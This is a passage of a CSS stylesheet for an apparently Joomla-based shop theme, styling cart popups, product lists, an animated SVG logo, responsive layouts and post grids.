  margin: 0 auto -20px;
  padding: 0 !important;
}
.popup-cart h3.title {
  font-size: 20px;
  line-height: 28px;
  margin-bottom: 40px;
  text-align: center;
  color: #4b4b4b;
}
.popup-cart h3.title span {
  display: block;
  font-weight: 600;
}
.popup-cart .popup-cart-product-quantity {
  font-weight: 500;
}
.popup-cart .item-wrap {
  overflow: hidden;
  clear: both;
  width: 560px;
  margin-bottom: 0px;
  text-align: left;
  padding: 0;
}
.popup-cart .item-wrap .item-name {
  font-size: 120%;
  font-weight: 600;
}
.popup-cart .item-wrap .vm-price-box {
  line-height: 35px;
  text-align: center;
  display: inline-block;
  clear: both;
  text-align: left;
}
.popup-cart .item-wrap .vm-price-box ins {
  font-size: 28px;
  line-height: 42px;
  text-decoration: none;
  float: left;
  letter-spacing: -2px;
  margin-right: 10px;
}
.popup-cart .item-wrap .vm-price-box del {
  font-size: 16px;
  color: #8d8d8d;
  letter-spacing: -1px;
  float: left;
}
.popup-cart .item-wrap .vm-price-box del span {
  vertical-align: baseline;
}
.popup-cart .button-group {
  text-align: center;
  margin: 30px auto 0;
}
.popup-cart .button-group .continue_link,
.popup-cart .button-group .showcart {
  width: 43%;
  display: block;
  float: left;
  left: 0;
  margin: 0 auto;
  padding: 10px 0;
  border-radius: 4px;
}
.popup-cart .button-group .continue_link {
  margin: 0 24px 0;
}
.popup-cart .button-group .continue_link:before {
  font-family: "peIcon7";
  position: relative;
  color: #fff;
  font-size: 17px;
  line-height: 1.2;
  content: "\e66e";
  margin: 5px 8px 0 0;
}
.popup-cart .button-group .showcart {
  margin: 0;
}
.popup-cart .item-img {
  float: left;
  margin-right: 30px;
}
.popup-cart .item-img img {
  max-width: 150px;
}
.vm-menu .divider {
  display: none;
}
.vm-menu .vm-title {
  font-size: 110%;
  margin: 12px auto 0;
  padding: 15px 0 5px;
  line-height: 1.3;
}
.vm-menu ul.productdetails li {
  text-align: initial;
  padding: 15px 0 8px;
  box-shadow: 0 1px 0px rgba(220,220,220,0.3);
}
.vm-menu ul.productdetails li .spacer-img {
  width: 30%;
  display: inline-block;
  margin: 0;
}
.vm-menu ul.productdetails li .spacer-img img {
  height: 60px;
  object-fit: cover;
}
.vm-menu ul.productdetails li .spacer-inner {
  width: 68%;
  display: inline-block;
  vertical-align: top;
  padding: 0 10px;
  margin: 0;
}
.vm-menu ul.productdetails li .spacer-inner h5 {
  display: block;
  width: 100%;
  font-size: 90%;
  padding: 0;
  margin: 0;
  line-height: 1.4;
}
.vm-menu ul.productdetails li .spacer-inner .PricesalesPrice {
  margin: 10px auto;
  font-size: 17px;
}
.vm-menu ul:last-child li {
  padding: 15px 0 0;
  box-shadow: none;
}
.vm-menu ul:last-child li .PricesalesPrice {
  margin: 10px auto 0;
}
.edit-shopper-form div.btn {
  margin: 7px 7px 0 0;
  padding: 6px 12px;
}
.edit-shopper-form div.btn a {
  padding: 0;
}
.edit-shopper-form div.btn a >img {
  display: none;
}
.edit-shopper-form #ui-tabs {
  margin: 25px auto;
}
.edit-shopper-form #ui-tabs li {
  padding: 4px 20px !important;
  line-height: 32px !important;
  height: 40px !important;
  border-radius: 5px 5px 0 0 !important;
}
.edit-shopper-form #ui-tabs >div {
  padding: 0;
  margin: 0;
  border-top: 1px solid #ccc;
  background: transparent !important;
}
.edit-shopper-form #ui-tabs >div li {
  height: 36px !important;
  padding: 2px 5px !important;
  border-radius: 0 !important;
}
@media (max-width: 992px) {
  .responsive-sm,
  .responsive-sm > div {
    padding: 0 !important;
  }
}
@media (max-width: 768px) {
  #com-form-login {
    margin: 20px auto;
    padding: 0 5%;
  }
  #com-form-login .width30 {
    width: 100%;
    margin: 5px auto !important;
  }
  #vmCartModule {
    position: relative;
    right: 10px;
    width: 60px;
  }
  #vmCartModule #cd-menu-trigger,
  #vmCartModule .cd-cart {
    width: 60px;
    margin: 0 auto;
    text-align: center;
  }
  #vmCartModule #cd-menu-trigger >i,
  #vmCartModule .cd-cart >i {
    text-align: center;
    margin: 0 auto;
    width: 60px;
  }
  #vmCartModule #cd-menu-trigger .total_products,
  #vmCartModule .cd-cart .total_products {
    right: 3px;
  }
  #vmCartModule #cd-menu-trigger.shopping-menu-is-open .cd-cart .total_products,
  #vmCartModule .cd-cart.shopping-menu-is-open .cd-cart .total_products {
    right: 3px;
  }
  header.centered #cart-menu .cd-cart,
  header.addspace #cart-menu .cd-cart {
    margin: 0 auto;
    top: 0 !important;
    text-align: center;
  }
  header.centered #cart-menu .cd-cart i,
  header.addspace #cart-menu .cd-cart i {
    margin: 0 auto;
    width: 90px;
    text-align: center !important;
  }
  header.centered #cart-menu .cd-cart .total_products,
  header.addspace #cart-menu .cd-cart .total_products {
    right: -12px !important;
  }
  header.centered #cart-menu.shopping-menu-is-open .cd-cart .total_products,
  header.addspace #cart-menu.shopping-menu-is-open .cd-cart .total_products {
    right: 18px !important;
  }
  .browse-view .row.productwrap {
    padding: 0;
    margin: 0;
  }
  .browse-view .row.productwrap .product {
    width: 100%;
  }
  .browse-view .row.productwrap .product .cd-customization {
    width: calc(65%) !important;
  }
  .browse-view .row.productwrap .product .calculate {
    width: 25% !important;
    margin: 4px 10px 0 0;
  }
  .form-validate {
    padding: 10px 4%;
  }
  table.user-details {
    width: 100%;
  }
  table.user-details tr td {
    width: 100%;
    clear: both;
    display: block;
  }
  table.user-details tr td label {
    clear: both;
    display: block;
    margin: 12px 0 0 !important;
    text-align: left;
  }
  table.user-details tr td input,
  table.user-details tr td select {
    min-width: 100%;
  }
  table.user-details tr td input {
    min-height: 39px;
  }
  table.user-details tr td select {
    width: auto;
    line-height: 38px;
    height: 38px;
  }
  table.user-details tr td .chzn-container-single .chzn-single {
    line-height: 37px !important;
    height: 38px !important;
  }
  .vmgroup .vm-product.productdetails li .spacer-img {
    width: 25%;
  }
  .vmgroup .vm-product.productdetails li .spacer-img img {
    width: 100%;
    height: 120px;
  }
  .vmgroup .vm-product.productdetails li .spacer-inner h5 {
    font-size: 120%;
    line-height: 1.4;
  }
  .vmgroup .vm-product.productdetails li .spacer-inner .PricesalesPrice {
    margin: 12px auto;
    font-size: 20px;
  }
  .vmgroup .vm-product.productdetails .cd-customization {
    font-size: 80%;
  }
  .vmgroup .vm-product.productdetails .cd-customization button.add-to-cart {
    height: 32px;
    width: 140px;
  }
  .vmgroup .vm-product.productdetails .cd-customization button.add-to-cart >input {
    line-height: 28px;
  }
  .popup-cart .item-wrap {
    width: 100%;
    text-align: center;
  }
  .popup-cart .item-wrap .item-name,
  .popup-cart .item-wrap .vm-price-box,
  .popup-cart .item-wrap .popup-cart-product-quantity {
    text-align: center !important;
    float: none !important;
  }
  .popup-cart .button-group {
    text-align: center;
    margin: 30px auto 0;
  }
  .popup-cart .button-group .continue_link,
  .popup-cart .button-group .showcart {
    width: 100%;
    display: block;
    margin: 0 auto;
  }
  .popup-cart .button-group .continue_link {
    margin: 0 auto 10px;
  }
  .popup-cart .item-img {
    float: left;
    width: 100%;
    margin: 0 auto;
  }
  .popup-cart .item-img img {
    width: 100%;
  }
  table.cart-summary .responsive-xs {
    padding: 10px 0 !important;
  }
  table.cart-summary .xs-cart-btn {
    width: 40px !important;
    display: block;
    margin: 0 auto;
    text-align: center;
    border-radius: 0 !important;
  }
}
svg.flex-logo-light {
  margin: 0 auto;
}
svg.flex-logo-light g#Background path#flex_rectangle_fill {
  opacity: 0;
  fill: transparent;
  stroke-dasharray: 1200;
  stroke-dashoffset: 1200;
  animation-name: fade-in;
  animation-duration: 0.5s;
  animation-delay: 3s;
  stroke-width: 0;
  animation-fill-mode: forwards;
  animation-iteration-count: 1;
  animation-timing-function: linear;
}
svg.flex-logo-light g#Background path#flex_rectangle {
  stroke: rgba(255,255,255,0.7);
  stroke-width: 7;
  stroke-dasharray: 2800;
  stroke-dashoffset: 2800;
  opacity: 1;
  animation-duration: 2.3s;
  animation-delay: 1s;
  animation-fill-mode: forwards;
  animation-iteration-count: 1;
  animation-name: show;
  animation-timing-function: linear;
}
svg.flex-logo-light g#flex_logo polygon {
  opacity: 0;
  stroke-width: 1;
  animation-duration: 0.7s;
  animation-delay: 2.5s;
  animation-fill-mode: forwards;
  animation-iteration-count: 1;
  animation-name: gradient_fade;
  animation-timing-function: linear;
}
svg.flex-logo-light g#flex_logo polygon#gradient_1 {
  fill: rgba(255,255,255,0.8);
}
svg.flex-logo-light g#flex_logo polygon#gradient_2 {
  fill: rgba(255,255,255,0.92);
}
svg.flex-logo-light g#flex_logo #logo_top_bckg {
  opacity: 0;
  stroke-width: 1;
  animation-duration: 0.7s;
  animation-delay: 2.5s;
  animation-fill-mode: forwards;
  animation-iteration-count: 1;
  animation-name: gradient_fade;
  animation-timing-function: linear;
}
svg.flex-logo-light g#flex_logo path {
  stroke-width: 7;
  stroke: rgba(255,255,255,0.7);
  opacity: 1;
  stroke-dasharray: 1500;
  stroke-dashoffset: 1500;
  animation-duration: 2s;
  animation-delay: 1s;
  animation-fill-mode: forwards;
  animation-iteration-count: 1;
  animation-name: gradient_fade;
  animation-timing-function: linear;
}
svg.flex-logo-light g#flex_logo path#logo_top {
  stroke-width: 7;
  stroke: rgba(255,255,255,0.7);
  stroke-dasharray: 2000;
  stroke-dashoffset: 2000;
  animation-duration: 2.5s;
  animation-delay: 0.6s;
}
svg.flex-logo-light g#flex_logo path#logo_main1 {
  stroke-dasharray: 1500;
  stroke-dashoffset: 1500;
  animation-duration: 3s;
  animation-delay: 1.6s;
}
svg.flex-logo-light g#flex_logo path#logo_main2 {
  stroke-dasharray: 1500;
  stroke-dashoffset: 1500;
  animation-duration: 3s;
  animation-delay: 2s;
}
svg.flex-logo-light g#flex path {
  stroke-width: 12;
  stroke: rgba(255,255,255,0.7);
  animation-fill-mode: forwards;
  animation-iteration-count: 1;
  animation-name: draw;
  animation-timing-function: linear;
}
svg.flex-logo-light g#flex path#f_top {
  stroke-width: 12;
  stroke-dasharray: 700;
  stroke-dashoffset: 700;
  animation-duration: 2s;
  animation-delay: 3s;
}
svg.flex-logo-light g#flex path#f {
  stroke-dasharray: 2810;
  stroke-dashoffset: 2810;
  animation-duration: 5s;
  animation-delay: 4s;
}
svg.flex-logo-light g#flex path#l {
  stroke-dasharray: 900;
  stroke-dashoffset: 900;
  animation-duration: 1.5s;
  animation-delay: 4.7s;
}
svg.flex-logo-light g#flex path#e {
  stroke-dasharray: 1500;
  stroke-dashoffset: 1500;
  animation-duration: 2s;
  animation-delay: 5s;
}
svg.flex-logo-light g#flex path#x {
  stroke-dasharray: 1500;
  stroke-dashoffset: 1500;
  animation-duration: 2s;
  animation-delay: 5.4s;
}
svg.flex-logo-light g#flex_after path {
  stroke-width: 0;
  opacity: 0;
  fill: transparent;
  animation-duration: 0.8s;
  animation-delay: 7s;
  animation-fill-mode: forwards;
  animation-iteration-count: 1;
  animation-name: flex_after_fade_light;
  animation-timing-function: linear;
}
svg.flex-logo-light g#flex_after path#f_top {
  fill: transparent;
  animation-duration: 1s;
  animation-delay: 8s;
  animation-fill-mode: forwards;
  animation-iteration-count: 2;
  animation-name: flex_after_f_top;
  animation-timing-function: ease-in-out;
}
svg.flex-logo-light.delayed g#Background path#flex_rectangle_fill {
  animation-duration: 0.5s;
  animation-delay: 5s;
  stroke-width: 0;
}
svg.flex-logo-light.delayed g#Background path#flex_rectangle {
  stroke-width: 7;
  animation-duration: 2.3s;
  animation-delay: 3s;
}
svg.flex-logo-light.delayed g#flex_logo polygon,
svg.flex-logo-light.delayed g#flex_logo #logo_top_bckg {
  stroke-width: 1;
  animation-duration: 0.7s;
  animation-delay: 4.5s;
}
svg.flex-logo-light.delayed g#flex_logo path {
  stroke-width: 7;
  stroke: rgba(255,255,255,0.7);
  animation-duration: 2s;
  animation-delay: 3s;
}
svg.flex-logo-light.delayed g#flex_logo path#logo_top {
  stroke-width: 7;
  stroke: rgba(255,255,255,0.7);
  animation-duration: 2.5s;
  animation-delay: 2.6s;
}
svg.flex-logo-light.delayed g#flex_logo path#logo_main1 {
  animation-duration: 3s;
  animation-delay: 3.6s;
}
svg.flex-logo-light.delayed g#flex_logo path#logo_main2 {
  animation-duration: 3s;
  animation-delay: 4s;
}
svg.flex-logo-light.delayed g#flex path {
  stroke-width: 8;
}
svg.flex-logo-light.delayed g#flex path#f_top {
  stroke-width: 12;
  animation-duration: 2s;
  animation-delay: 5s;
}
svg.flex-logo-light.delayed g#flex path#f {
  animation-duration: 5s;
  animation-delay: 6s;
}
svg.flex-logo-light.delayed g#flex path#l {
  animation-duration: 1.5s;
  animation-delay: 6.7s;
}
svg.flex-logo-light.delayed g#flex path#e {
  animation-duration: 2s;
  animation-delay: 7s;
}
svg.flex-logo-light.delayed g#flex path#x {
  animation-duration: 2s;
  animation-delay: 7.4s;
}
svg.flex-logo-light.delayed g#flex_after path {
  animation-duration: 0.8s;
  animation-delay: 9s;
}
svg.flex-logo-light.delayed g#flex_after path#f_top {
  animation-duration: 1s;
  animation-delay: 7s;
  animation-fill-mode: forwards;
  animation-iteration-count: 1;
}
svg.flex-logo-default {
  max-width: 400px;
  margin: 0 auto;
}
svg.flex-logo-default g#Background path#flex_rectangle_fill {
  opacity: 0;
  fill: transparent;
  stroke-dasharray: 1200;
  stroke-dashoffset: 1200;
  animation-name: fade-in;
  animation-duration: 0.5s;
  animation-delay: 3s;
  stroke-width: 0;
  animation-fill-mode: forwards;
  animation-iteration-count: 1;
  animation-timing-function: linear;
}
svg.flex-logo-default g#Background path#flex_rectangle {
  stroke: rgba(0,0,0,0.7);
  stroke-width: 7;
  stroke-dasharray: 2800;
  stroke-dashoffset: 2800;
  opacity: 1;
  animation-duration: 2.3s;
  animation-delay: 1s;
  animation-fill-mode: forwards;
  animation-iteration-count: 1;
  animation-name: show;
  animation-timing-function: linear;
}
svg.flex-logo-default g#flex_logo polygon {
  opacity: 0;
  stroke-width: 1;
  animation-duration: 0.7s;
  animation-delay: 2.5s;
  animation-fill-mode: forwards;
  animation-iteration-count: 1;
  animation-name: gradient_fade;
  animation-timing-function: linear;
}
svg.flex-logo-default g#flex_logo polygon#gradient_1 {
  fill: rgba(255,255,255,0.8);
}
svg.flex-logo-default g#flex_logo polygon#gradient_2 {
  fill: rgba(255,255,255,0.92);
}
svg.flex-logo-default g#flex_logo #logo_top_bckg {
  opacity: 0;
  stroke-width: 1;
  animation-duration: 0.7s;
  animation-delay: 2.5s;
  animation-fill-mode: forwards;
  animation-iteration-count: 1;
  animation-name: gradient_fade;
  animation-timing-function: linear;
}
svg.flex-logo-default g#flex_logo path {
  stroke-width: 7;
  stroke: rgba(0,0,0,0.7);
  opacity: 1;
  stroke-dasharray: 1500;
  stroke-dashoffset: 1500;
  animation-duration: 2s;
  animation-delay: 1s;
  animation-fill-mode: forwards;
  animation-iteration-count: 1;
  animation-name: gradient_fade;
  animation-timing-function: linear;
}
svg.flex-logo-default g#flex_logo path#logo_top {
  stroke-width: 7;
  stroke: rgba(0,0,0,0.7);
  stroke-dasharray: 2000;
  stroke-dashoffset: 2000;
  animation-duration: 2.5s;
  animation-delay: 0.6s;
}
svg.flex-logo-default g#flex_logo path#logo_main1 {
  stroke-dasharray: 1500;
  stroke-dashoffset: 1500;
  animation-duration: 3s;
  animation-delay: 1.6s;
}
svg.flex-logo-default g#flex_logo path#logo_main2 {
  stroke-dasharray: 1500;
  stroke-dashoffset: 1500;
  animation-duration: 3s;
  animation-delay: 2s;
}
svg.flex-logo-default g#flex path {
  stroke-width: 12;
  stroke: rgba(0,0,0,0.5);
  animation-fill-mode: forwards;
  animation-iteration-count: 1;
  animation-name: draw;
  animation-timing-function: linear;
}
svg.flex-logo-default g#flex path#f_top {
  stroke-width: 12;
  stroke-dasharray: 700;
  stroke-dashoffset: 700;
  animation-duration: 2s;
  animation-delay: 3s;
}
svg.flex-logo-default g#flex path#f {
  stroke-dasharray: 2810;
  stroke-dashoffset: 2810;
  animation-duration: 5s;
  animation-delay: 4s;
}
svg.flex-logo-default g#flex path#l {
  stroke-dasharray: 900;
  stroke-dashoffset: 900;
  animation-duration: 1.5s;
  animation-delay: 4.7s;
}
svg.flex-logo-default g#flex path#e {
  stroke-dasharray: 1500;
  stroke-dashoffset: 1500;
  animation-duration: 2s;
  animation-delay: 5s;
}
svg.flex-logo-default g#flex path#x {
  stroke-dasharray: 1500;
  stroke-dashoffset: 1500;
  animation-duration: 2s;
  animation-delay: 5.4s;
}
svg.flex-logo-default g#flex_after path {
  stroke-width: 0;
  opacity: 0;
  fill: transparent;
  animation-duration: 0.8s;
  animation-delay: 7s;
  animation-fill-mode: forwards;
  animation-iteration-count: 1;
  animation-name: flex_after_fade_default;
  animation-timing-function: linear;
}
svg.flex-logo-default g#flex_after path#f_top {
  fill: transparent;
  animation-duration: 1s;
  animation-delay: 8s;
  animation-fill-mode: forwards;
  animation-iteration-count: 2;
  animation-name: flex_after_f_top;
  animation-timing-function: ease-in-out;
}
svg.flex-logo-default.delayed g#Background path#flex_rectangle_fill {
  animation-duration: 0.5s;
  animation-delay: 5s;
  stroke-width: 0;
}
svg.flex-logo-default.delayed g#Background path#flex_rectangle {
  stroke-width: 7;
  animation-duration: 2.3s;
  animation-delay: 3s;
}
svg.flex-logo-default.delayed g#flex_logo polygon,
svg.flex-logo-default.delayed g#flex_logo #logo_top_bckg {
  stroke-width: 1;
  animation-duration: 0.7s;
  animation-delay: 4.5s;
}
svg.flex-logo-default.delayed g#flex_logo path {
  stroke-width: 7;
  stroke: rgba(0,0,0,0.7);
  animation-duration: 2s;
  animation-delay: 3s;
}
svg.flex-logo-default.delayed g#flex_logo path#logo_top {
  stroke-width: 7;
  stroke: rgba(0,0,0,0.7);
  animation-duration: 2.5s;
  animation-delay: 2.6s;
}
svg.flex-logo-default.delayed g#flex_logo path#logo_main1 {
  animation-duration: 3s;
  animation-delay: 3.6s;
}
svg.flex-logo-default.delayed g#flex_logo path#logo_main2 {
  animation-duration: 3s;
  animation-delay: 4s;
}
svg.flex-logo-default.delayed g#flex path {
  stroke-width: 8;
}
svg.flex-logo-default.delayed g#flex path#f_top {
  stroke-width: 12;
  animation-duration: 2s;
  animation-delay: 5s;
}
svg.flex-logo-default.delayed g#flex path#f {
  animation-duration: 5s;
  animation-delay: 6s;
}
svg.flex-logo-default.delayed g#flex path#l {
  animation-duration: 1.5s;
  animation-delay: 6.7s;
}
svg.flex-logo-default.delayed g#flex path#e {
  animation-duration: 2s;
  animation-delay: 7s;
}
svg.flex-logo-default.delayed g#flex path#x {
  animation-duration: 2s;
  animation-delay: 7.4s;
}
svg.flex-logo-default.delayed g#flex_after path {
  animation-duration: 0.8s;
  animation-delay: 9s;
}
svg.flex-logo-default.delayed g#flex_after path#f_top {
  animation-duration: 1s;
  animation-delay: 7s;
  animation-fill-mode: forwards;
  animation-iteration-count: 1;
}
@keyframes draw {
  to {
    stroke-dashoffset: 0;
    stroke-width: 4;
    opacity: 1;
  }
}
@keyframes show {
  to {
    opacity: 1;
    stroke-dashoffset: 0;
    stroke-width: 0;
  }
}
@keyframes fade-in {
  to {
    opacity: 1;
    fill: rgba(241,72,51,0.9);
    stroke-dashoffset: 0;
    stroke-width: 0;
  }
}
@keyframes gradient_fade {
  to {
    opacity: 1;
    stroke-dashoffset: 0;
    stroke-width: 0;
  }
}
@keyframes flex_after_fade_default {
  to {
    opacity: 1;
    stroke-width: 0;
    stroke-dashoffset: 0;
    fill: rgba(85,85,85,0.7);
    stroke: rgba(85,85,85,0.7);
  }
}
@keyframes flex_after_fade_light {
  to {
    opacity: 1;
    stroke-width: 0;
    stroke-dashoffset: 0;
    fill: rgba(255,255,255,0.6);
    stroke: rgba(255,255,255,0.5);
  }
}
@keyframes flex_after_f_top {
  to {
    opacity: 1;
    stroke-width: 5;
    stroke-dashoffset: 0;
    fill: rgba(241,72,51,0.85);
    stroke: #f14833;
  }
}
.hidden-print {
  padding: 0 25px;
  margin: 0;
  text-align: center;
  position: relative;
  display: table;
}
.hidden-print >a {
  display: table;
  margin: 0;
  right: 0;
  padding: 8px 40px;
  background: #18A2B8;
  color: #fff;
  border-radius: 3px;
  letter-spacing: 1px;
  text-transform: uppercase;
  text-shadow: 1px 2px 2px rgba(0,0,0,0.2);
  font-weight: 500;
}
@media print {
  .visible-print {
    display: inherit !important;
  }
  .hidden-print {
    display: none !important;
  }
}
@media (min-width: 992px) {
  #sp-addspace-logo div.row {
    display: -webkit-box;
    display: -moz-box;
    display: -webkit-flex;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-align: center;
    -webkit-align-items: center;
    -ms-flex-align: center;
    -ms-align-items: center;
    align-items: center;
  }
  .no-gutter .row > [class*="col-md"],
  .no-gutter .row-fluid > [class*="col-"],
  .no-padding > div > .row > [class*="col-"],
  .no-padding > div > .row-fluid > [class*="col-"],
  .no-gutter {
    padding-right: 0;
    padding-left: 0;
    display: -webkit-box;
    display: -moz-box;
    display: -webkit-flex;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-align: center;
    -webkit-align-items: center;
    -ms-flex-align: center;
    -ms-align-items: center;
    align-items: center;
    -webkit-box-pack: center;
    -webkit-justify-content: center;
    -ms-justify-content: center;
    justify-content: center;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .sp-megamenu-parent {
    padding: 0;
  }
  .sp-megamenu-parent >li >a {
    padding: 0 8px;
  }
}
@media (min-width: 768px) and (max-width: 992px) {
  .flipper .back {
    overflow: hidden;
  }
  .flipper .back .sppb-person-block .sppb-person-information {
    padding: 2px 5px 0 5px !important;
  }
  .flipper .back .sppb-person-introtext {
    padding: 3px 10px !important;
    margin-top: 0;
    font-size: 80% !important;
  }
  .flipper .back .sppb-person-social-icons {
    position: absolute;
    width: 100%;
    line-height: 35px;
    margin-bottom: -8px;
    background: #fff;
  }
  .btn.responsive,
  .sppb-btn.responsive {
    white-space: normal;
  }
  .sp-comingsoon a.logo img.sp-default-logo {
    margin: 0 auto !important;
  }
  .sp-comingsoon a.logo div.backhome {
    display: none;
  }
  .sp-comingsoon a.logo:hover img.sp-default-logo {
    text-align: center;
    margin: 0 auto;
  }
}
@media (max-width: 768px) {
  #sp-addspace-logo div.row img {
    margin: 2vh 0;
  }
  .has-left-right-modules .sppb-in-article-left .sp-column,
  .has-left-right-modules .sppb-in-article-right .sp-column {
    width: 100%;
    padding: 15px 35px;
  }
  #sp-top2 {
    margin-left: auto;
    margin-right: auto;
  }
  #sp-top2 ul {
    width: auto;
    margin-left: auto;
    margin-right: auto;
  }
  #sp-addspace-logo #sp-logo,
  #sp-addspace-logo #sp-addspace {
    -webkit-box-pack: center;
    -webkit-justify-content: center;
    -ms-justify-content: center;
    justify-content: center;
  }
  .addspace .sp-column,
  .centered .sp-column {
    text-align: center;
  }
  .addspace .sp-column >div,
  .centered .sp-column >div {
    width: 100%;
    margin: 0 auto;
  }
  .addspace >.container >.row #cart-menu,
  .centered >.container >.row #cart-menu {
    float: left;
  }
  .addspace >.container >.row #cart-menu.shopping-menu-is-open,
  .centered >.container >.row #cart-menu.shopping-menu-is-open {
    padding: 0;
    width: 100vw;
    height: 100vh;
  }
  .top-search-wrapper {
    right: 30px;
    width: 50px;
  }
  .top-search-wrapper .icon-top-wrapper {
    cursor: pointer;
    width: 50px;
  }
  .top-search-wrapper .icon-top-wrapper i.fa,
  .top-search-wrapper .icon-top-wrapper i.fas,
  .top-search-wrapper .icon-top-wrapper i.far {
    font-size: 16px;
    text-align: center;
    width: 50px;
    margin: 0 auto;
  }
  .top-search-wrapper .icon-top-wrapper i.pe {
    font-size: 20px;
    text-align: center;
    width: 50px;
    margin: 0 auto;
  }
  .top-search-wrapper .icon-top-wrapper i.pe.search-close-icon.open {
    font-size: 27px;
  }
  .top-search-input-wrap .top-search-wrap {
    position: absolute;
    right: 5vw;
    left: auto;
    float: none;
    width: 70vw;
    margin: -20px auto 0;
  }
  .top-search-input-wrap .top-search-wrap .sp_search_input {
    width: 80vw;
    margin: 0 auto;
  }
  .centered .top-search-wrap,
  .addspace .top-search-wrap {
    position: absolute;
    right: -20vw;
    left: auto;
    float: none;
    width: 70vw;
    margin: -20px auto 0;
  }
  .sppb-addon-image-content .sppb-image-holder {
    position: inherit;
    width: 100%;
    min-height: 350px;
  }
  .com-sppagebuilder #sp-main-body #sp-left,
  .com-sppagebuilder #sp-main-body #sp-right {
    padding: 0 30px;
    margin-left: 0;
    margin-right: 0;
  }
  .sppb-content-holder {
    padding: 20px 0 50px 0 !important;
  }
  .sppb-addon-animated-number {
    text-align: center;
  }
  .flipper {
    width: 100%;
    margin: 25px auto;
  }
  .flipper .back .sppb-person-block .thumb,
  .flipper .back .sppb-person-block .sppb-person-information {
    width: 50%;
  }
  .flipper .back .sppb-person-block .sppb-person-information {
    padding: 15px 10px 15px 20px;
  }
  .flipper .back .sppb-person-block .sppb-person-information .sppb-person-name {
    font-size: 160%;
  }
  .flipper .back .sppb-person-block .sppb-person-information .sppb-person-designation {
    line-height: 1.6;
    font-size: 120%;
  }
  .flipper .back .sppb-person-introtext {
    padding: 15px 25px;
    line-height: 1.8 !important;
    font-size: 100% !important;
  }
  .sp-comingsoon a.logo img.sp-default-logo {
    margin: 0 auto !important;
  }
  .sp-comingsoon a.logo div.backhome {
    display: none;
  }
  .sp-comingsoon a.logo:hover img.sp-default-logo {
    text-align: center;
    margin: 0;
  }
  .mobile-centered {
    text-align: center !important;
    margin-left: auto !important;
    margin-right: auto !important;
    float: none !important;
    display: table;
  }
  .offline-container {
    width: 100vw;
  }
  .offline-container .offline-inner {
    width: 90vw;
    border-radius: 4px;
  }
  .offline-container .offline-inner .sp-comingsoon-countdown {
    padding: 0;
  }
  .offline-container .offline-inner .days,
  .offline-container .offline-inner .hours,
  .offline-container .offline-inner .minutes,
  .offline-container .offline-inner .seconds {
    width: 23%;
    padding: 5px;
  }
}
@media (max-width: 480px) {
  .productwrap .product {
    width: 100%;
    display: block;
  }
  .offline-container .offline-inner #form-login {
    width: 90%;
  }
  .cd-headline .cd-words-wrapper > b {
    white-space: normal;
    clear: both;
  }
  .sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge::before,
  .sppb-addon-timeline .sppb-addon-timeline-wrapper .timeline-badge::after,
  .sppb-addon-timeline .sppb-addon-timeline-wrapper::before,
  .sppb-addon-timeline .sppb-addon-timeline-wrapper::after {
    display: none;
  }
  .timeline-movement {
    padding: 0;
  }
  .timeline-movement:before,
  .timeline-movement:after {
    padding: 0;
  }
  .timeline-movement.odd,
  .timeline-movement.even {
    width: 100%;
    display: table;
    margin: 0 auto;
    left: 0;
    right: 0;
    position: relative;
  }
  .timeline-movement.odd:after {
    position: relative;
    margin: 50px auto;
    height: 1px;
    top: 48px;
    bottom: auto;
    width: 40%;
    padding: 0;
    background-color: #f89e92;
  }
  .timeline-movement.even:before {
    background-color: #f89e92;
    bottom: 10px;
    content: " ";
    height: 1px;
    left: 0;
    position: absolute;
    right: 0;
    top: auto;
    width: 40%;
    margin: 0 auto;
  }
  .timeline-movement.even:after {
    display: none;
  }
  #sp-cookie-consent.position-bottom_left,
  #sp-cookie-consent.position-bottom_right {
    width: calc(90%) !important;
    margin: 0 auto;
    bottom: 20px;
    box-shadow: 0 4px 8px rgba(50,50,50,0.2);
  }
}
@media only screen and (max-device-width: 800px),only screen and (device-width: 1024px) and (device-height: 600px),only screen and (width: 1280px) and (orientation: landscape),only screen and (device-width: 800px),only screen and (max-width: 767px) {
  .flex-video {
    padding-top: 0;
  }
}
.ajax-posts,
.grid {
  -webkit-transition: height 0.7s ease;
  -moz-transition: height 0.7s ease;
  -o-transition: height 0.7s ease;
  transition: height 0.7s ease;
  -webkit-transform-origin: 50% 100%;
  transform-origin: 50% 100%;
  overflow: hidden;
}
.ajax-post {
  padding: 0;
  margin: 0;
  -webkit-transform-origin: 50% 50%;
  transform-origin: 50% 50%;
}
.ajax-post .inner [class^="entry-"] {
  margin: 0 0 22px 0;
}
.ajax-post .inner.intro-left {
  width: auto;
}
.ajax-post .inner.intro-left h3.aga_heading {
  margin-top: 0;
  padding-top: 0;
}
.ajax-post .inner.intro-center .entry-image,
.ajax-post .inner.intro-center div[class^="entry-"] {
  margin: 0 auto;
}
.ajax-post .inner.intro-right h3.aga_heading {
  margin-top: 0;
  padding-top: 0;
}
.ajax-post .inner .intro-image {
  position: relative;
  display: block;
  margin: 0 auto;
  -webkit-transform: translateZ(0) scale(1.0001);
  transform: translateZ(0) scale(1.0001);
  overflow: hidden;
}
.ajax-post .inner .intro-image a img.post-img {
  -webkit-transition: .7s cubic-bezier(0.250,0,0.350,1.100) .1s;
  -moz-transition: .7s cubic-bezier(0.250,0,0.350,1.100) .1s;
  -o-transition: .7s cubic-bezier(0.250,0,0.350,1.100) .1s;
  transition: .7s cubic-bezier(0.250,0,0.350,1.100) .1s;
  -webkit-transform: translateZ(0) scale(1);
  transform: translateZ(0) scale(1);
  width: 100%;
  -webkit-filter: blur(0.01em) grayscale(0%);
  filter: blur(0.01em) grayscale(0%);
}
.ajax-post .inner.overlay .intro-image {
  overflow: hidden;
}
.ajax-post .inner.overlay .intro-image a {
  display: block;
}
.ajax-post .inner.overlay .intro-image a:after {
  content: "";
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  text-align: center;
  color: #fff;
  -webkit-transition: background .5s ease;
  -moz-transition: background .5s ease;
  -o-transition: background .5s ease;
  transition: background .5s ease;
  background: transparent;
  display: block;
  position: absolute;
  width: 100%;
  height: 100%;
}
.ajax-post .inner.overlay .intro-image a .caption-content {
  position: absolute;
  font-weight: 500;
  font-size: 100%;
  color: #fff;
  padding: 0 10%;
  top: 53%;
  width: 100%;
  text-align: center;
  -webkit-transition: .7s cubic-bezier(0.300,0,0.100,1.100) .1s;
  -moz-transition: .7s cubic-bezier(0.300,0,0.100,1.100) .1s;
